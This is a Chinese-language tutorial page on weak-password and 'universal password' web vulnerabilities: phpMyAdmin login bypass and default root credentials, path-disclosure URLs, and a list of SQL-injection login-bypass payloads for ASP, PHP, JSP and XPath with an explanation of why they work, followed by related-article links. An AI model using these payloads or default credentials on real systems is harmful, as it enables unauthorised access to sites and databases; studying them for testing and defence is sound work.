前言:将web漏洞中万能密码也归类于弱口令篇。

1.phpmyadmin

phpmyadmin万能密码

其实应该叫phpmyadmin万能账号,因为是在帐号处输入漏洞信息,而密码不需要输入

用户名处写入'localhost'@'@"则登录成功,密码无需输入 (全部为英文标点符号)

phpmyadmin 爆绝对路径

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

漏洞影响版本  2.11.4 , 2.11.3

phpmyadmin弱口令

phpMyAdmin默认账号密码

用户名 root

密码  root

或空登陆。

phpmyadmin root空密码

用户名 root 登陆,无需密码。

漏洞影响版本 2.11.9.2

2.web后台站万能密码admin'or'1'='1

'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1–

"or"a"="a

'xor

'or'='or'

(asp、aspx的万能密码)

1:"or "a"="a

2:')or('a'='a

3:'or'='or'

4:'or 1=1–

5:a'or' 1=1–

6:"or 1=1–

7:'or'a'='a

8:"or"="a'='a

9:'or"='

10:admin'or'1=1

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:'or 1=1%00

15:'xor

'or'='or'

(PHP的万能密码)

or 1=1/*

User:something

Pass:OR 1=1

(jsp的万能密码)

1or1=1

admin OR 1=1/*

xpath注入万能密码

"or 1=1 or "='

万能密码原理:

由于一些网站后台输入账号密码未进行字符过滤导致sql注入万能密码

如下为 登陆源码语句select * from user where username='$user' and password ='$pass'

输入万能密码  'or'1'='1select * from user where username=''or '1'='1' and password ='' or'1'='1'

可以看到 or 直接绕过,使得判断逻辑语句一直为真,对于一些代码可以进行绕过万能密码进入后台,这样SQL返回的值始终为1,就成功绕过了程序的验证。

php弱口令总结,web漏洞之弱口令相关推荐

  1. 【web漏洞】弱口令

    弱口令 漏洞介绍 弱口令也是安全漏洞的一种,是指系统登录口令的设置强度不高,容易被攻击者猜到或 破解.造成弱口令的主要原因是系统的运维人员.管理人员安全意识不足.常见的弱口令形 式包括:系统出厂默认口 ...

  2. web安全之弱口令漏洞学习总结

    漏洞介绍 弱口令也是安全漏洞的一种,是指系统登录口令的设置强度不高,容易被攻击者猜到或破解.造成弱口令的主要原因是系统的运维人员.管理人员安全意识不足.常见的弱口令形式包括:系统出厂默认口令没有修改: ...

  3. 米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历

    米斯特白帽培训讲义 漏洞篇 弱口令.爆破.遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜 ...

  4. 看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行

    看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行 clouds 2017-06-19 共492809人围观 ,发现 6 个不明物体 网络安全 在这篇文章中,我将向大家分享我们团队最近在对某企 ...

  5. 米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历

    米斯特白帽培训讲义 漏洞篇 弱口令.爆破.遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜 ...

  6. 常见的web漏洞及其防范(转)

    一.SQL注入漏洞  SQL注入攻击(SQL Injection),简称注入攻击.SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞.在设计程序,忽略了对输入字符串中夹带 ...

  7. 10大Web漏洞扫描器

    10大Web漏洞扫描器 美国最权威的RSA大会研究显示,Web应用安全已超过所有以前网络层安全(如DDos),逐渐成为最严重.最广泛.危害性最大的安全问题.如华为.RSA.赛门铁克.联想ThinkPa ...

  8. 各种Web漏洞测试平台

    为什么80%的码农都做不了架构师?>>>    Sqli Lab ​支持报错注入.二次注入.盲注.Update注入.Insert注入.Http头部注入.二次注入练习等.支持GET和P ...

  9. xray 被动_长亭xray:一款自动化Web漏洞扫描神器(免费社区版)

    xray简介 xray (https://github.com/chaitin/xray) 是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动.被动多种扫描方式,自备盲打平台.可以灵活定义 P ...

最新文章

  1. Visual Studio 2017 第三方依赖设置,附加依赖项和附加库目录
  2. CentOS 7 + MySql 中文乱码解决方案
  3. 两步实现spark集群
  4. 实战SSM_O2O商铺_47【Redis缓存】清除缓存接口的开发
  5. 移动App的发展趋势
  6. 跳槽9招让你“空降”任何企业都能成功
  7. Sharepoint域账户,运行Power Shell报错
  8. 【youcans 的 OpenCV 例程200篇】125. 形态算法之提取连通分量
  9. Bzoj4199:[NOI2015]品酒大会
  10. 微型计算机中常体积的,微型计算机原理及应用第2章.ppt
  11. hadoop复合键排序使用方法
  12. 如何用计算机解一元三次方程,利用Excel电子表格解一元三次方程
  13. 日常生活 之 有哪些道理是你慢慢才明白的?
  14. win7系统用笔记本做wifi热点
  15. [OpenCV] cv.remap() 重映射学习笔记/map1 map2易混点
  16. 如何查看计算机硬盘的软件内存条,内存检测工具,内存检测软件 - 内存条检测工具就用金山卫士 - 安全专题...
  17. sim_com AT
  18. newuoa matlab包,PDFO首页、文档和下载 - Powell 无导数优化求解器
  19. excel空白单元格自动填充上一单元格内容
  20. 访问苹果开发者网站太慢

热门文章

  1. 孙飞脸色一变,惊讶道:“修者,你也是修者?”
  2. MFC界面编程基础(08):菜单(一)
  3. 打开任务管理器的多种方法
  4. java客服管理系统计算机毕业设计MyBatis+系统+LW文档+源码+调试部署
  5. 『团队协作的五大障碍』读书所得
  6. 深度学习基础知识点【更新中】
  7. 微信个人好友增加到10000人啦!
  8. 【Python】一篇文章学习Pandas包 Pandas Series、DataFrame 对比学习
  9. 华为-IGP协议-ospf精简篇(带实验验证)
  10. Unity引擎与Cocos引擎的区别